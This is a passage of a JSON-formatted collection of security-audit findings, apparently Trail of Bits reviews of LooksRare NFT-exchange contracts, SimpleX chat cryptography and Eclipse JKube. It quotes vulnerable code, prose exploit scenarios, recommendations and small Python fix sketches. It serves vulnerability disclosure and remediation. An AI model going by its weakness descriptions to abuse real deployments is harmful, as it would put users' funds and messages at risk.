", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Lack of two-step process for contract ownership changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The owner of a LooksRare protocol contract can be changed by calling the transferOwnership function in OpenZeppelin's Ownable contract. This function internally calls the _transferOwnership function, which immediately sets the contract's new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership () public virtual onlyOwner { _transferOwnership( address ( 0 )); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership ( address newOwner ) public virtual onlyOwner { require (newOwner != address ( 0 ), \"Ownable: new owner is the zero address\" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership ( address newOwner ) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } Figure 2.1: OpenZeppelin's Ownable contract Exploit Scenario Alice and Bob invoke the transferOwnership() function on the LooksRare multisig wallet to change the address of an existing contract's owner. They accidentally enter the wrong address, and ownership of the contract is transferred to the incorrect address. As a result, access to the contract is permanently revoked. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, identify and document all possible actions that can be taken by privileged accounts (appendix E) and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.
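The recommended two-step handover reduces to a propose/accept state machine, comparable to OpenZeppelin's Ownable2Step; a minimal Python sketch of the logic (our illustration, not contract code):

class TwoStepOwnable:
    # Ownership changes complete only when the new owner claims them.
    def __init__(self, owner: str):
        self.owner = owner
        self.pending_owner = None

    def transfer_ownership(self, caller: str, new_owner: str) -> None:
        assert caller == self.owner, 'only the current owner may propose'
        self.pending_owner = new_owner  # a typo here is still recoverable

    def accept_ownership(self, caller: str) -> None:
        # Only the proposed address can complete the transfer, so a
        # mistyped proposal can never permanently strand the contract.
        assert caller == self.pending_owner, 'only the pending owner'
        self.owner, self.pending_owner = caller, None

o = TwoStepOwnable('alice')
o.transfer_ownership('alice', 'bob')
o.accept_ownership('bob')
assert o.owner == 'bob'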
", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "3. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "Although dependency scans did not identify a direct threat to the project under review, npm and yarn audit identified a dependency with a known vulnerability. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the repositories under review. The output below details the high severity issue: CVE ID", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "4. Users that create ask orders cannot modify minPercentageToAsk ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "Users who sell their NFTs on LooksRare are unable to protect their orders against arbitrary changes in royalty fees set by NFT collection owners; as a result, users may receive less of a sale's value than expected. Ideally, when a user lists an NFT, he should be able to set a threshold at which the transaction will execute based on the amount of the sale's value that he will receive. This threshold is set via the minPercentageToAsk variable in the MakerOrder and TakerOrder structs. The minPercentageToAsk variable protects users who create ask orders from excessive royalty fees. When funds from an order are transferred, the LooksRareExchange contract ensures that the percentage amount that needs to be transferred to the recipient is greater than or equal to minPercentageToAsk (figure 4.1). function _transferFeesAndFunds ( address strategy , address collection , uint256 tokenId , address currency , address from , address to , uint256 amount , uint256 minPercentageToAsk ) internal { // Initialize the final amount that is transferred to seller uint256 finalSellerAmount = amount; // 1. Protocol fee { uint256 protocolFeeAmount = _calculateProtocolFee(strategy, amount); [...] finalSellerAmount -= protocolFeeAmount; } } // 2. Royalty fee { ( address royaltyFeeRecipient , uint256 royaltyFeeAmount ) = royaltyFeeManager.calculateRoyaltyFeeAndGetRecipient( collection, tokenId, amount ); // Check if there is a royalty fee and that it is different to 0 [...] finalSellerAmount -= royaltyFeeAmount; [...] require ( (finalSellerAmount * 10000 ) >= (minPercentageToAsk * amount), \"Fees: Higher than expected\" ); [...] } Figure 4.1: The _transferFeesAndFunds function in LooksRareExchange:422-466 However, users creating ask orders cannot modify minPercentageToAsk. By default, the minPercentageToAsk of orders placed through the LooksRare platform is set to 85%. In cases in which there is no royalty fee and the protocol fee is 2%, minPercentageToAsk could be set to 98%. Exploit Scenario Alice lists an NFT for sale on LooksRare. The protocol fee is 2%, minPercentageToAsk is 85%, and there is no royalty fee. The NFT project grows in popularity, which motivates Eve, the owner of the NFT collection, to raise the royalty fee to 9.5%, the maximum fee allowed by the RoyaltyFeeRegistry contract. Bob purchases Alice's NFT. Alice receives 88.5% of the sale even though she could have received 98% of the sale at the time of the listing. Recommendations Short term, set minPercentageToAsk to 100% minus the sum of the protocol fee and the max value for a royalty fee, which is 9.5%. Long term, identify and validate the bounds for all parameters and variables in the smart contract system.
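Replaying the slippage check from figure 4.1 in Python makes the exploit scenario's numbers concrete (a worked example with fees in basis points; the function name is ours):

def sale_passes(amount: int, protocol_fee_bps: int, royalty_bps: int,
                min_percentage_to_ask_bps: int) -> bool:
    # Mirrors: finalSellerAmount * 10000 >= minPercentageToAsk * amount
    final_seller_amount = (amount
                           - amount * protocol_fee_bps // 10000
                           - amount * royalty_bps // 10000)
    return final_seller_amount * 10000 >= min_percentage_to_ask_bps * amount

# At listing time: 2% protocol fee, no royalty, default 85% floor.
assert sale_passes(10_000, 200, 0, 8500)
# After the royalty rises to 9.5%, the order still executes at the
# 85% floor even though the seller now receives only 88.5%.
assert sale_passes(10_000, 200, 950, 8500)
# A 98% floor would have rejected the repriced sale.
assert not sale_passes(10_000, 200, 950, 9800)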
", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "5. Excessive privileges of RoyaltyFeeSetter and RoyaltyFeeRegistry owners ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The RoyaltyFeeSetter and RoyaltyFeeRegistry contract owners can manipulate an NFT collection's royalty information, such as the fee percentage and the fee receiver; this violates the principle of least privilege. NFT collection owners can use the RoyaltyFeeSetter contract to set the royalty information for their NFT collections. This information is stored in the RoyaltyFeeRegistry contract. However, the owners of the two contracts can also update this information (figures 5.1 and 5.2). function updateRoyaltyInfoForCollection ( address collection , address setter , address receiver , uint256 fee ) external override onlyOwner { require (fee <= royaltyFeeLimit, \"Registry: Royalty fee too high\" ); _royaltyFeeInfoCollection[collection] = FeeInfo({ setter: setter, receiver: receiver, fee: fee }); emit RoyaltyFeeUpdate(collection, setter, receiver, fee); } Figure 5.1: The updateRoyaltyInfoForCollection function in RoyaltyFeeRegistry:54- function updateRoyaltyInfoForCollection ( address collection , address setter , address receiver , uint256 fee ) external onlyOwner { IRoyaltyFeeRegistry(royaltyFeeRegistry).updateRoyaltyInfoForCollection( collection, setter, receiver, fee ); } Figure 5.2: The updateRoyaltyInfoForCollection function in RoyaltyFeeSetter:102-109 This violates the principle of least privilege. Since it is the responsibility of the NFT collection's owner to set the royalty information, it is unnecessary for contract owners to have the same ability. Exploit Scenario Alice, the owner of the RoyaltyFeeSetter contract, sets the incorrect receiver address when updating the royalty information for Bob's NFT collection. Bob is now unable to receive fees from his NFT collection's secondary sales. Recommendations Short term, remove the ability for the contract owners to update an NFT collection's royalty information. Long term, clearly document the responsibilities and levels of access provided to privileged users of the system. 6.
Insufficient protection of sensitive information Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-LR-6 Target: contracts/hardhat.config.ts", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "7. Contracts used as dependencies do not track upstream changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The LooksRare codebase uses a third-party contract, SignatureChecker, but the LooksRare documentation does not specify which version of the contract is used or whether it was modified. This indicates that the LooksRare protocol does not track upstream changes in contracts used as dependencies. Therefore, the LooksRare contracts may not reliably reflect updates or security fixes implemented in their dependencies, as those updates must be manually integrated into the contracts. Exploit Scenario A third-party contract used in LooksRare receives an update with a critical fix for a vulnerability, but the update is not manually integrated in the LooksRare version of the contract. An attacker detects the use of a vulnerable contract in the LooksRare protocol and exploits the vulnerability against one of the contracts. Recommendations Short term, review the codebase and document the source and version of each dependency. Include third-party sources as submodules in the project's Git repository to maintain internal path consistency and ensure that dependencies are updated periodically. Long term, use an Ethereum development environment and NPM to manage packages in the project.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "8. Missing event for a critical operation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The system does not emit an event when a protocol fee is levied in the _transferFeesAndFunds and _transferFeesAndFundsWithWETH functions. Operations that transfer value or perform critical operations should trigger events so that users and off-chain monitoring tools can account for important state changes. if ((protocolFeeRecipient != address (0)) && (protocolFeeAmount != 0)) { IERC20(currency).safeTransferFrom(from, protocolFeeRecipient, protocolFeeAmount); finalSellerAmount -= protocolFeeAmount; } Figure 8.1: Protocol fee transfer in _transferFeesAndFunds function ( contracts/executionStrategies/StrategyDutchAuction.sol#L440-L443 ) Exploit Scenario A smart contract wallet provider has a LooksRare integration that enables its users to buy and sell NFTs. The front end relies on information from LooksRare's subgraph to itemize prices, royalties, and fees. Because the system does not emit an event when a protocol fee is incurred, an under-calculation in the wallet provider's accounting leads its users to believe they have been overcharged. Recommendations Short term, add events for all critical operations that transfer value, such as when a protocol fee is assessed. Events are vital aids in monitoring contracts and detecting suspicious behavior. Long term, consider adding or accounting for a new protocol fee event in the LooksRare subgraph and any other off-chain monitoring tools LooksRare might be using.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "9.
Taker orders are not EIP-712 signatures ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "When takers attempt to match order proposals, they are presented with an obscure blob of data. In contrast, makers are presented with a formatted data structure that makes it easier to validate transactions. struct TakerOrder { bool isOrderAsk ; // true --> ask / false --> bid address taker ; // msg.sender uint256 price ; // final price for the purchase uint256 tokenId ; uint256 minPercentageToAsk ; // slippage protection (9000 --> 90% of the final price must return to ask) bytes params ; // other params (e.g., tokenId) } Figure 9.1: The TakerOrder struct in OrderTypes.sol:31-38 While this issue cannot be exploited directly, it creates an asymmetry between the user experience (UX) of makers and takers. Because of this, users depend on the information that the user interface (UI) displays to them and are limited by the UX of the wallet software they are using. Exploit Scenario 1 Eve, a malicious user, lists a new collection with the same metadata as another, more popular collection. Bob sees Eve's listing and thinks that it is the legitimate collection. He creates an order for an NFT in Eve's collection, and because he cannot distinguish the parameters of the transaction he is signing, he matches it, losing money in the process. Exploit Scenario 2 Alice, an attacker, compromises the UI, allowing her to manipulate the information displayed by it in order to make illegitimate collections look legitimate. This is a more extreme exploit scenario. Recommendations Short term, evaluate and document the current UI and the pitfalls that users might encounter when matching and creating orders. Long term, evaluate whether adding support for EIP-712 signatures in TakerOrder would minimize the issue and provide a better UX.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "10. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The LooksRare contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the LooksRare contracts.
Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "11. isContract may behave unexpectedly ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The LooksRare exchange relies on OpenZeppelin's SignatureChecker library to verify signatures on-chain. This library, in turn, relies on the isContract function in the Address library to determine whether the signer is a contract or an externally owned account (EOA). However, in Solidity, there is no reliable way to definitively determine whether a given address is a contract, as there are several edge cases in which the underlying extcodesize function can return unexpected results. function isContract( address account) internal view returns ( bool ) { // This method relies on extcodesize, which returns 0 for contracts in // construction, since the code is only stored at the end of the // constructor execution. uint256 size; assembly { size := extcodesize (account) } return size > 0; } Figure 11.1: The isContract function in Address.sol#L27-37 Exploit Scenario A maker order is created and signed by a smart contract wallet. While this order is waiting to be filled, selfdestruct is called on the contract. The call to extcodesize returns 0, causing isContract to return false. Even though the order was signed by an ERC1271-compatible contract, the verify method will attempt to validate the signer's address as though it were signed by an EOA. Recommendations Short term, clearly document for developers that SignatureChecker.verify is not guaranteed to accurately distinguish between an EOA and a contract signer, and emphasize that it should never be used in a manner that requires such a guarantee. Long term, avoid adding or altering functionality that would rely on a guarantee that a signature's source remains consistent over time.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "12. tokenId and amount fully controlled by the order strategy when matching two orders ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "When two orders are matched, the strategy defined by the MakerOrder is called to check whether the order can be executed. function matchAskWithTakerBidUsingETHAndWETH ( OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk ) external payable override nonReentrant { [...] // Retrieve execution parameters ( bool isExecutionValid , uint256 tokenId , uint256 amount ) = IExecutionStrategy(makerAsk.strategy) .canExecuteTakerBid(takerBid, makerAsk); require (isExecutionValid, \"Strategy: Execution invalid\" ); [...] } Figure 12.1: matchAskWithTakerBidUsingETHAndWETH ( LooksRareExchange.sol#186-212 ) The strategy call returns a boolean indicating whether the order match can be executed, the tokenId to be sold, and the amount to be transferred. The LooksRareExchange contract does not verify these last two values, which means that the strategy has full control over them. function matchAskWithTakerBidUsingETHAndWETH ( OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk ) external payable override nonReentrant { [...]
// Execution part 1/2 _transferFeesAndFundsWithWETH( makerAsk.strategy, makerAsk.collection, tokenId, makerAsk.signer, takerBid.price, makerAsk.minPercentageToAsk ); // Execution part 2/2 _transferNonFungibleToken(makerAsk.collection, makerAsk.signer, takerBid.taker, tokenId, amount); emit TakerBid( askHash, makerAsk.nonce, takerBid.taker, makerAsk.signer, makerAsk.strategy, makerAsk.currency, makerAsk.collection, tokenId, amount, takerBid.price ); } Figure 12.2: matchAskWithTakerBidUsingETHAndWETH ( LooksRareExchange.sol#217-228 ) This ultimately means that a faulty or malicious strategy can cause a loss of funds (e.g., by returning a different tokenId from the one that was intended to be sold or bought). Additionally, this issue may become problematic if strategies become trustless and are no longer developed or allowlisted by the LooksRare team. Exploit Scenario A faulty strategy, which returns a different tokenId than expected, is allowlisted in the protocol. Alice creates a new order using that strategy to sell one of her tokens. Bob matches Alice's order, but because the tokenId is not validated before executing the order, he gets a different token than he intended to buy. Recommendations Short term, evaluate and document this behavior and use this documentation when integrating new strategies into the protocol. Long term, consider adding further safeguards to the LooksRareExchange contract to check the validity of the tokenId and the amount returned by the call to the strategy.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "13. Risk of phishing due to data stored in maker order params field ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The MakerOrder struct contains a params field, which holds arbitrary data for each strategy. This storage of data may increase the chance that users could be phished. struct MakerOrder { bool isOrderAsk; // true --> ask / false --> bid address signer; // signer of the maker order address collection; // collection address uint256 price; // price (used as ) uint256 tokenId; // id of the token uint256 amount; // amount of tokens to sell/purchase (must be 1 for ERC721, 1+ for ERC1155) address strategy; // strategy for trade execution (e.g., DutchAuction, StandardSaleForFixedPrice) address currency; // currency (e.g., WETH) uint256 nonce; // order nonce (must be unique unless new maker order is meant to override existing one e.g., lower ask price) uint256 startTime; // startTime in timestamp uint256 endTime; // endTime in timestamp uint256 minPercentageToAsk; // slippage protection (9000 --> 90% of the final price must return to ask) bytes params; // additional parameters uint8 v; // v: parameter (27 or 28) bytes32 r; // r: parameter bytes32 s; // s: parameter } Figure 13.1: The MakerOrder struct in contracts/libraries/OrderTypes.sol#L12-29 In the Dutch auction strategy, the maker params field defines the start price for the auction. When a user generates the signature, the UI must specify the purpose of params.
function canExecuteTakerBid (OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk) external view override returns ( bool , uint256 , uint256 ) { uint256 startPrice = abi.decode(makerAsk.params, ( uint256 )); uint256 endPrice = makerAsk.price; } Figure 13.2: The canExecuteTakerBid function in contracts/executionStrategies/StrategyDutchAuction.sol#L39-L70 When used in a StrategyPrivateSale transaction, the params field holds the buyer address that the private sale is intended for. function canExecuteTakerBid(OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk) external view override returns ( bool , uint256 , uint256 ) { // Retrieve target buyer address targetBuyer = abi.decode(makerAsk.params, ( address )); return ( ((targetBuyer == takerBid.taker) && (makerAsk.price == takerBid.price) && (makerAsk.tokenId == takerBid.tokenId) && (makerAsk.startTime <= block.timestamp ) && (makerAsk.endTime >= block.timestamp )), makerAsk.tokenId, makerAsk.amount ); } Figure 13.3: The canExecuteTakerBid function in contracts/executionStrategies/StrategyPrivateSale.sol Exploit Scenario Alice receives an EIP-712 signature request through MetaMask. Because the value is masked in the params field, Alice accidentally signs an incorrect parameter that allows an attacker to match. Recommendations Short term, document the expected values of the params field for all strategies and add in-code documentation to ensure that developers are aware of strategy expectations. Long term, document the risks associated with off-chain signatures and always ensure that users are aware of the risks of signing arbitrary data.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "14. Use of legacy openssl version in solidity-coverage plugin ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "The LooksRare codebase uses a version of solidity-coverage that relies on a legacy version of openssl to run. While this plugin does not alter protocol contracts deployed to production, the use of outdated security protocols anywhere in the codebase may be risky or prone to errors. Error in plugin solidity-coverage: Error: error:0308010C:digital envelope routines::unsupported Figure 14.1: Error raised by npx hardhat coverage Recommendations Short term, refactor the code to use a new version of openssl to prevent the exploitation of openssl vulnerabilities. Long term, avoid using outdated or legacy versions of dependencies.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "15. TypeScript compiler errors during deployment ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", + "body": "TypeScript throws an error while trying to compile scripts during the deployment process. scripts/helpers/deploy-exchange.ts:29:5 - error TS7053: Element implicitly has an 'any' type because expression of type 'string' can't be used to index type '{ mainnet: string; rinkeby: string; localhost: string; }'. No index signature with a parameter of type 'string' was found on type '{ mainnet: string; rinkeby: string; localhost: string; }'.
29 config.Fee.Standard[activeNetwork] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Figure 15.1: TypeScript error raised by npx hardhat run --network localhost scripts/hardhat/deploy-hardhat.ts In the config.ts file, the config object does not explicitly allow string types to be used as an index type for accessing its keys. Hardhat assigns a string type as the value of activeNetwork. As a result, TypeScript throws a compiler error when it tries to access a member of the config object using the activeNetwork value. Recommendations Short term, add type information to the config object that allows its keys to be accessed using string types. Long term, ensure that TypeScript can compile properly without errors in any and every potential context.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "1. X3DH does not apply HKDF to generate secrets ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", + "body": "The extended triple Diffie-Hellman (X3DH) key agreement protocol works by computing three separate Diffie-Hellman computations between pairs of keys. In particular, each party has a longer-term private and public key pair as well as a more short-term private and public key pair. The three separate Diffie-Hellman computations are performed between the various pairs of long-term and short-term keys. The key agreement is performed this way to simultaneously authenticate each party and provide forward secrecy, which limits the impact of compromised keys. When performing the X3DH key agreement, the final shared secret is formed by applying HKDF to the concatenation of all three Diffie-Hellman outputs. The computation is performed this way so that the shared secret depends on the entropy of all three Diffie-Hellman computations. If the X3DH protocol is being used to generate multiple shared secrets (which is the case for SimpleX), then these secrets should be formed by computing the HKDF over all three Diffie-Hellman outputs and then splitting the output of HKDF into separate shared secrets. However, as shown in figure 1.1, the SimpleX implementation of X3DH uses each of the three Diffie-Hellman outputs as separate secrets for the Double Ratchet protocol, rather than inputting them into HKDF and splitting the output. x3dhSnd :: DhAlgorithm a => PrivateKey a -> PrivateKey a -> E2ERatchetParams a -> RatchetInitParams x3dhSnd spk1 spk2 ( E2ERatchetParams _ rk1 rk2) = x3dh (publicKey spk1, rk1) (dh' rk1 spk2) (dh' rk2 spk1) (dh' rk2 spk2) x3dhRcv :: DhAlgorithm a => PrivateKey a -> PrivateKey a -> E2ERatchetParams a -> RatchetInitParams x3dhRcv rpk1 rpk2 ( E2ERatchetParams _ sk1 sk2) = x3dh (sk1, publicKey rpk1) (dh' sk2 rpk1) (dh' sk1 rpk2) (dh' sk2 rpk2) x3dh :: DhAlgorithm a => ( PublicKey a, PublicKey a) -> DhSecret a -> DhSecret a -> DhSecret a -> RatchetInitParams x3dh (sk1, rk1) dh1 dh2 dh3 = RatchetInitParams {assocData, ratchetKey = RatchetKey sk, sndHK = Key hk, rcvNextHK = Key nhk} where assocData = Str $ pubKeyBytes sk1 <> pubKeyBytes rk1 (hk, rest) = B.splitAt 32 $ dhBytes' dh1 <> dhBytes' dh2 <> dhBytes' dh3 (nhk, sk) = B.splitAt 32 rest Figure 1.1: simplexmq/src/Simplex/Messaging/Crypto/Ratchet.hs#L98-L112 Performing the X3DH protocol this way will increase the impact of compromised keys and have implications for the theoretical forward secrecy of the protocol. To see why this is the case, consider what happens if a single key pair, (sk2, spk2), is compromised. In the current implementation, if an attacker compromises this key pair, then they can immediately recover the header key, hk, and the ratchet key, sk. However, if this were implemented by first computing the HKDF over all three Diffie-Hellman outputs, then the attacker would not be able to recover these keys without also compromising another key pair. Note that SimpleX does not perform X3DH with long-term identity keys, as the SimpleX protocol does not rely on long-term keys to identify client devices. Therefore, the impact of compromising a key will be less severe, as it will affect only the secrets of the current session. Exploit Scenario An attacker is able to compromise a single X3DH key pair of a client using SimpleX chat. Because of how the X3DH is performed, they are able to then compromise the client's header key and ratchet key and can decrypt some of their messages. Recommendations Short term, adjust the X3DH implementation so that HKDF is computed over the concatenation of dh1, dh2, and dh3 before obtaining the ratchet key and header keys.
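The short-term fix is mechanical: derive every session key from one HKDF over the concatenated Diffie-Hellman outputs, then split, so no single compromised pair reveals any key. The sketch below implements RFC 5869 HKDF-SHA256 with Python's standard library (our illustration of the recommended derivation, with a hypothetical info label; not the project's Haskell code):

import hashlib, hmac

def hkdf(ikm: bytes, length: int, salt: bytes = b'', info: bytes = b'') -> bytes:
    # RFC 5869 extract-then-expand with SHA-256.
    prk = hmac.new(salt or b'\x00' * 32, ikm, hashlib.sha256).digest()
    okm, block, counter = b'', b'', 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]),
                         hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]

def derive_ratchet_keys(dh1: bytes, dh2: bytes, dh3: bytes):
    # One HKDF over all three DH outputs, then split into the header
    # key, next header key, and ratchet key (32 bytes each), instead of
    # using each DH output directly as a key.
    okm = hkdf(dh1 + dh2 + dh3, 96, info=b'SimpleX-X3DH-sketch')
    return okm[:32], okm[32:64], okm[64:]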
", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "2. The pad function is incorrect for long messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", + "body": "The pad function from the Simplex.Messaging.Crypto module uses the fromIntegral function, resulting in an integer overflow bug that leads to incorrect length encoding for messages longer than 65535 bytes (Figure 2.1). At the moment, the function appears to be called only with messages shorter than that; however, due to the general nature of the module, there is a risk of using pad with longer messages, as the message length assumption is not documented. pad :: ByteString -> Int -> Either CryptoError ByteString pad msg paddedLen | padLen >= 0 = Right $ encodeWord16 (fromIntegral len) <> msg <> B.replicate padLen '#' | otherwise = Left CryptoLargeMsgError where len = B.length msg padLen = paddedLen - len - 2 Figure 2.1: simplexmq/src/Simplex/Messaging/Crypto.hs#L805-L811 Exploit Scenario The pad function is used on messages longer than 65535 bytes, introducing a security vulnerability. Recommendations Short term, change the pad function to check whether the message length fits into 16 bits and return CryptoLargeMsgError if it does not. Long term, write unit tests for the pad function. Avoid using fromIntegral to cast to smaller integer types; instead, create a new function that safely casts to smaller types and returns Maybe.
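The overflow is easy to demonstrate and to guard against; in the Python sketch below (struct.pack('>H', ...) plays the role of encodeWord16), an explicit length check rejects oversized messages before the 16-bit encoding can wrap:

import struct

def pad(msg: bytes, padded_len: int) -> bytes:
    # Reject anything whose length cannot be encoded in 16 bits,
    # rather than letting the length wrap as fromIntegral does.
    if len(msg) > 0xFFFF or padded_len - len(msg) - 2 < 0:
        raise ValueError('CryptoLargeMsgError')
    header = struct.pack('>H', len(msg))  # big-endian 16-bit length
    return header + msg + b'#' * (padded_len - len(msg) - 2)

# Without the check, a 65536-byte message would be framed with
# length 65536 % 2**16 == 0 and decoded incorrectly.
print(pad(b'hello', 16))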
", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "3. The unPad function throws an exception for short messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", + "body": "The unPad function throws an undocumented exception when the input is empty or a single byte. This is due to the decodeWord16 function, which throws an IOException if the input is not exactly two bytes. The unPad function does not appear to be used on such short inputs in the current code. unPad :: ByteString -> Either CryptoError ByteString unPad padded | B.length rest >= len = Right $ B.take len rest | otherwise = Left CryptoLargeMsgError where ( lenWrd , rest) = B.splitAt 2 padded len = fromIntegral $ decodeWord16 lenWrd Figure 3.1: simplexmq/src/Simplex/Messaging/Crypto.hs#L813-L819 Exploit Scenario The unPad function takes a user-controlled input and throws an exception that is not handled in a thread that is critical to the functioning of the protocol, resulting in a denial of service. Recommendations Short term, validate the length of the input passed to the unPad function and return an error if the input is too short. Long term, write unit tests for the unPad function to ensure the validation works as intended.
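Symmetrically, the decoder should validate its framing up front; a Python sketch of the hardened behavior (same framing as the pad sketch above; the error strings are ours):

import struct

def unpad(padded: bytes) -> bytes:
    # Check that the header exists before decoding it, instead of
    # letting the two-byte split throw an unhandled exception.
    if len(padded) < 2:
        raise ValueError('input shorter than the two-byte length header')
    (length,) = struct.unpack('>H', padded[:2])
    rest = padded[2:]
    if len(rest) < length:
        raise ValueError('CryptoLargeMsgError')
    return rest[:length]

assert unpad(b'\x00\x05hello' + b'#' * 9) == b'hello'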
", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "4. Key material resides in unpinned memory and is not cleared after its lifetime ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/SimpleXChat.pdf", + "body": "The key material generated and processed by the SimpleXMQ library resides in unpinned memory, and the data is not cleared from memory as soon as it is no longer used. The key material will stay on the Haskell heap until it is garbage collected and overwritten by other data. Combined with the unpinned memory pages on which the Haskell heap is allocated, this creates a risk of paging out unencrypted memory pages with the key material to disk. Because memory management is abstracted away by the language, the manual memory management required to pin and zero out memory in a garbage-collected language such as Haskell is challenging. This issue does not concern the communication security; only device security is affected. Exploit Scenario The unencrypted key material is paged out to the hard drive, where it is exposed and can be stolen by an attacker. Recommendations Short term, investigate the use of mlock/mlockall on supported platforms to prevent memory pages that contain key material from being paged out. Explicitly zero out the key material as soon as it is no longer needed. Long term, document the key material memory management and the threat model around it.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "1. Insecure defaults in generated artifacts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-eclipse-jkube-securityreview.pdf", + "body": "JKube can generate Kubernetes deployment artifacts and deploy applications using those artifacts. By default, many of the security features offered by Kubernetes are not enabled in these artifacts. This can cause the deployed applications to have more permissions than their workload requires. If such an application were compromised, the permissions would enable the attacker to perform further attacks against the container or host. Kubernetes provides several ways to further limit these permissions, some of which are documented in appendix E. Similarly, the generated artifacts do not employ some best practices, such as referencing container images by hash, which could help prevent certain supply chain attacks. We compiled several of the examples contained in the quickstarts folder and analyzed them. We observed instances of the following problems in the artifacts produced by JKube: Pods have no associated network policies. Dockerfiles have base image references that use the latest tag. Container image references use the latest tag, or no tag, instead of a named tag or a digest. Resource (CPU, memory) limits are not set. Containers do not have the allowPrivilegeEscalation setting set. Containers are not configured to use a read-only filesystem. Containers run as the root user and have privileged capabilities. Seccomp profiles are not enabled on containers. Service account tokens are mounted on pods where they may not be needed. Exploit Scenario An attacker compromises one application running on a Kubernetes cluster. The attacker takes advantage of the lax security configuration to move laterally and attack other system components. 